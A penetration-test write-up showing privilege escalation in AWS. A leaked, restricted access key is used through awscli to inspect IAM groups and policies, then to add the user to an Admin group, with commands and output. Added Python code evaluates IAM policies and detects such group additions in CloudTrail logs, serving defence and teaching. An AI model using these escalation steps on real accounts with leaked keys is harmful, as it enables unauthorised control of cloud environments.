AWS Privilege Escalation using add user to group.

Posted on Tue 29 October 2019 in cloud-security

Context

During a recent internal pentest, an unauthenticated config storage endpoint leaked some of the access tokens for the AWS environment.

The token itself was fairly restricted and I was looking for ways to move laterally. It did not allow listing or assuming roles, nor creating, modifying or deleting users.

We used the awscli to enumerate the permissions we had and to escalate privileges.

Pre-Requisites

  • Install awscli (pip install awscli)
  • Run aws configure to enter the credentials you received.
  • The final ~/.aws/credentials file should look like:

    [corp]
    aws_access_key_id=AXXAXBO3XXRXS6KXXXXX
    aws_secret_access_key=XXXXXXXWUBK/GcX5XXbpZXXlmjCT2XXXXX

AWS Privilege Escalation

AWS access keys consist of an aws_access_key_id and aws_secret_access_key pair and can be used to query the AWS API with the aws cli.

  • Get the details of the user the key belongs to: aws iam get-user --profile corp
{
    "User": {
        "Path": "/",
        "UserName": "build@corp.com",
        "UserId": "AXXXXXXXXXXXXXXXXXX",
        "Arn": "arn:aws:iam::1X98XXXXX9:user/build@corp.com",
        "CreateDate": "2019-04-29T16:53:19Z",
        "PasswordLastUsed": "2019-07-29T21:45:55Z"
    }
}
  • Check whether the key can list users; it can: aws iam list-users --profile corp

  • Check whether it can list groups; this succeeds as well: aws iam list-groups --profile corp

The list-groups call returned the groups in the account. The general idea: if there is a group with elevated privileges (an administrative group) and the token holds iam:AddUserToGroup, the user can simply be added to that group.

Inspecting the PowerUsers group shows that our user is one of its members:

aws iam get-group --group-name PowerUsers --profile corp

{
    "Users": [
        {
            .....
        },
        {
            ....
        },
        {
            ....
        },
        {
            ....
        },
        {
          ....
        },
        {
            "Path": "/",
            "UserName": "build@corp.com",
            "UserId": "AXXXXXXXXXXXXXXX",
            "Arn": "arn:aws:iam::1X9XXXXXXXX09:user/build@corp.com",
            "CreateDate": "2019-04-29T16:53:19Z",
            "PasswordLastUsed": "2019-07-29T21:45:55Z"
        }
    ],
    "Group": {
        "Path": "/",
        "GroupName": "PowerUsers",
        "GroupId": "AXXXXXXXXXXXXXXX",
        "Arn": "arn:aws:iam::17XXXXXXX09:group/PowerUsers",
        "CreateDate": "2016-04-06T04:57:55Z"
    }
}

Checking the policies attached to the PowerUsers group:

aws iam list-attached-group-policies --group-name PowerUsers --profile corp

{
    "AttachedPolicies": [
        {
            "PolicyName": "PowerUsers-Policy",
            "PolicyArn": "arn:aws:iam::179856XXXX:policy/PowerUsers-Policy"
        }
    ]
}

aws iam get-policy-version --policy-arn "arn:aws:iam::179856XXXXXXX:policy/PowerUsers-Policy" --version-id 'v1' --profile corp

{
    "PolicyVersion": {
        "Document": {
            "Version": "2012-10-17",
            "Statement": [
                {
                    "Effect": "Allow",
                    "NotAction": [
                        "iam:ListUsers",
                        "iam:GetUser",
                        "iam:AddUserToGroup",
                        "iam:ListGroupsForUser",
                        "iam:ListUserPolicies",
                        "iam:ListAttachedUserPolicies",
                        "iam:DeleteSigningCertificate",
                        "iam:RemoveUserFromGroup",
                        "iam:DetachUserPolicy",
                        "iam:DeleteUserPolicy"
                    ],
                    "Resource": "*"
                }
            ]
        },
        "VersionId": "v1",
        "IsDefaultVersion": false,
        "CreateDate": "2016-06-06T13:56:29Z"
    }
}
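The statement above is easy to misread, so here is an added example (not code from the original post) that evaluates identity-based policy documents the way IAM's basic logic does: an explicit Deny wins, otherwise any matching Allow grants, otherwise the action is implicitly denied. It embeds the PowerUsers-Policy v1 document from the output above alongside a constructed contrasting policy that names iam:AddUserToGroup in Action rather than NotAction. Resource and Condition elements, permission boundaries and SCPs are deliberately ignored, so treat it as a reading aid, not a replacement for aws iam simulate-principal-policy.

```python
import json
import re

# Policy document exactly as returned by get-policy-version above (PowerUsers-Policy, v1).
POWERUSERS_V1 = json.loads("""
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "NotAction": [
                "iam:ListUsers",
                "iam:GetUser",
                "iam:AddUserToGroup",
                "iam:ListGroupsForUser",
                "iam:ListUserPolicies",
                "iam:ListAttachedUserPolicies",
                "iam:DeleteSigningCertificate",
                "iam:RemoveUserFromGroup",
                "iam:DetachUserPolicy",
                "iam:DeleteUserPolicy"
            ],
            "Resource": "*"
        }
    ]
}
""")

# Constructed contrasting policy (not from the page): an explicit grant of the action.
EXPLICIT_ALLOW = {
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": "iam:AddUserToGroup", "Resource": "*"}],
}

# Constructed explicit deny (not from the page), to show Deny overriding Allow.
EXPLICIT_DENY = {
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Deny", "Action": "iam:*", "Resource": "*"}],
}


def _as_list(value):
    """IAM accepts either a string or a list for Statement/Action/NotAction."""
    return value if isinstance(value, list) else [value]


def _action_matches(pattern, action):
    """IAM action patterns are case-insensitive and support * and ? wildcards."""
    regex = re.escape(pattern).replace(r"\*", ".*").replace(r"\?", ".")
    return re.fullmatch(regex, action, re.IGNORECASE) is not None


def statement_covers(stmt, action):
    """True if the statement's Action/NotAction element applies to `action`.
    NotAction inverts the match: the listed actions are the ones NOT covered."""
    if "Action" in stmt:
        return any(_action_matches(p, action) for p in _as_list(stmt["Action"]))
    if "NotAction" in stmt:
        return not any(_action_matches(p, action) for p in _as_list(stmt["NotAction"]))
    return False


def is_allowed(policy_docs, action):
    """Simplified identity-policy evaluation over all attached documents:
    explicit Deny wins, then any Allow, otherwise implicit deny."""
    allowed = False
    for doc in policy_docs:
        for stmt in _as_list(doc["Statement"]):
            if not statement_covers(stmt, action):
                continue
            if stmt["Effect"] == "Deny":
                return False
            if stmt["Effect"] == "Allow":
                allowed = True
    return allowed


def excluded_actions(policy_doc):
    """Actions named in NotAction of Allow statements: what the statement does
    NOT grant, which is what an attached policy listing can be mistaken for."""
    names = []
    for stmt in _as_list(policy_doc["Statement"]):
        if stmt.get("Effect") == "Allow" and "NotAction" in stmt:
            names.extend(_as_list(stmt["NotAction"]))
    return names


if __name__ == "__main__":
    for docs, label in [([POWERUSERS_V1], "PowerUsers-Policy v1"),
                        ([EXPLICIT_ALLOW], "explicit Allow"),
                        ([POWERUSERS_V1, EXPLICIT_ALLOW], "both attached")]:
        print(f"{label}: iam:AddUserToGroup allowed = {is_allowed(docs, 'iam:AddUserToGroup')}")
```

Run against the v1 document alone, the evaluator reports iam:AddUserToGroup as not allowed while nearly everything else (iam:ListGroups, any s3 action) is; the grant that made the later add-user-to-group call succeed has to come from the policy's default version or another attached policy, so always fetch DefaultVersionId from aws iam get-policy before drawing conclusions from a non-default version.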

We have the required permissions: iam:AddUserToGroup appears in the policy document, and the add-user-to-group call below confirms the token holds it. Two details in the output deserve a careful read, though. The statement uses Effect Allow together with NotAction, which grants every action except the ones listed, so this statement on its own excludes iam:AddUserToGroup rather than granting it. And IsDefaultVersion is false, so v1 is not the version in force; aws iam get-policy returns the DefaultVersionId that should be fetched instead. The list-groups output also shows an Admin group; inspecting its attached policies:

aws iam list-attached-group-policies --group-name Admin --profile corp

{
    "AttachedPolicies": [
        {
            "PolicyName": "AdministratorAccess",
            "PolicyArn": "arn:aws:iam::aws:policy/AdministratorAccess"
        }
    ]
}

Now all that is left is to add our user to that group:

aws iam add-user-to-group --group-name Admin --user-name build@corp.com --profile corp

Let's verify that the user has been added to the Admin group and therefore has administrator privileges:

aws iam get-group --group-name Admin --profile corp

{
    "Users": [
        {
            .....
        },
        {
            ....
        },
        {
            ....
        },
        {
            ....
        },
        {
          ....
        },
        {
            "Path": "/",
            "UserName": "build@corp.com",
            "UserId": "AXXXXXXXXXXXXXXX",
            "Arn": "arn:aws:iam::1X9XXXXXXXX09:user/build@corp.com",
            "CreateDate": "2019-04-29T16:53:19Z",
            "PasswordLastUsed": "2019-07-29T21:45:55Z"
        }
    ],
    "Group": {
        "Path": "/",
        "GroupName": "Admin",
        "GroupId": "AXXXXXXXXXXXXXXX",
        "Arn": "arn:aws:iam::17XXXXXXX09:group/Admin",
        "CreateDate": "2016-04-06T04:57:55Z"
    }
}
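From the defender's side, the AddUserToGroup call above is exactly the event to alert on. The following added example (not from the original post) walks CloudTrail records, which IAM emits with eventSource iam.amazonaws.com and eventName AddUserToGroup, and flags additions to groups known to carry AdministratorAccess as well as principals adding themselves to any group. The log records are constructed samples that mirror the scenario in this post, and the set of privileged group names is an assumed input (in practice derived from list-attached-group-policies across all groups).

```python
import json

# Constructed CloudTrail log file in the {"Records": [...]} shape (sample data, not real events).
SAMPLE_LOG = json.dumps({"Records": [
    {
        "eventTime": "2019-10-29T10:15:02Z",
        "eventSource": "iam.amazonaws.com",
        "eventName": "ListGroups",
        "userIdentity": {"type": "IAMUser", "userName": "build@corp.com"},
        "requestParameters": None,
        "sourceIPAddress": "203.0.113.10",
    },
    {   # the self-add to an admin group seen in this post
        "eventTime": "2019-10-29T10:16:40Z",
        "eventSource": "iam.amazonaws.com",
        "eventName": "AddUserToGroup",
        "userIdentity": {"type": "IAMUser", "userName": "build@corp.com"},
        "requestParameters": {"groupName": "Admin", "userName": "build@corp.com"},
        "sourceIPAddress": "203.0.113.10",
    },
    {   # routine onboarding by an IAM administrator, not flagged
        "eventTime": "2019-10-29T11:02:11Z",
        "eventSource": "iam.amazonaws.com",
        "eventName": "AddUserToGroup",
        "userIdentity": {"type": "IAMUser", "userName": "iam-admin"},
        "requestParameters": {"groupName": "Developers", "userName": "alice"},
        "sourceIPAddress": "198.51.100.7",
    },
    {   # a failed attempt against the admin group; still worth a finding
        "eventTime": "2019-10-29T11:30:00Z",
        "eventSource": "iam.amazonaws.com",
        "eventName": "AddUserToGroup",
        "userIdentity": {"type": "IAMUser", "userName": "ci-bot"},
        "requestParameters": {"groupName": "Admin", "userName": "bob"},
        "errorCode": "AccessDenied",
        "sourceIPAddress": "198.51.100.9",
    },
]})

# Assumed input: groups found to have AdministratorAccess attached.
PRIVILEGED_GROUPS = {"Admin"}


def load_records(log_text):
    """Parse one CloudTrail log file; each file is a JSON object with a Records list."""
    return json.loads(log_text).get("Records", [])


def find_suspicious_group_adds(records, privileged_groups):
    """Return one finding per AddUserToGroup event that touches a privileged group
    or where the caller adds itself. Failed attempts are kept and marked."""
    findings = []
    for ev in records:
        if ev.get("eventSource") != "iam.amazonaws.com" or ev.get("eventName") != "AddUserToGroup":
            continue
        params = ev.get("requestParameters") or {}
        group = params.get("groupName")
        target = params.get("userName")
        actor = (ev.get("userIdentity") or {}).get("userName")
        reasons = []
        if group in privileged_groups:
            reasons.append("privileged-group")
        if actor is not None and actor == target:
            reasons.append("self-add")
        if not reasons:
            continue
        findings.append({
            "time": ev.get("eventTime"),
            "actor": actor,
            "target": target,
            "group": group,
            "source_ip": ev.get("sourceIPAddress"),
            "succeeded": "errorCode" not in ev,
            "reasons": reasons,
        })
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_group_adds(load_records(SAMPLE_LOG), PRIVILEGED_GROUPS):
        print(finding)
```

The same logic maps directly onto a CloudWatch Logs metric filter or an EventBridge rule on the IAM event; the point of keeping failed attempts is that an AccessDenied on AddUserToGroup against an admin group is usually someone testing exactly the path described in this post.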

Conclusion

Misconfigured AWS IAM policies are common, and one should always try to escalate privileges after obtaining a token.

These methods are not novel and are extensively covered in the AWS IAM privilege escalation blog post. I tried using PACU to automate the attack but it couldn't find a way, and hence relied on manual methods with some reading up of the documentation on the awscli and permissions.

References

  • https://docs.aws.amazon.com/cli/latest/reference/iam/
  • https://github.com/RhinoSecurityLabs/AWS-IAM-Privilege-Escalation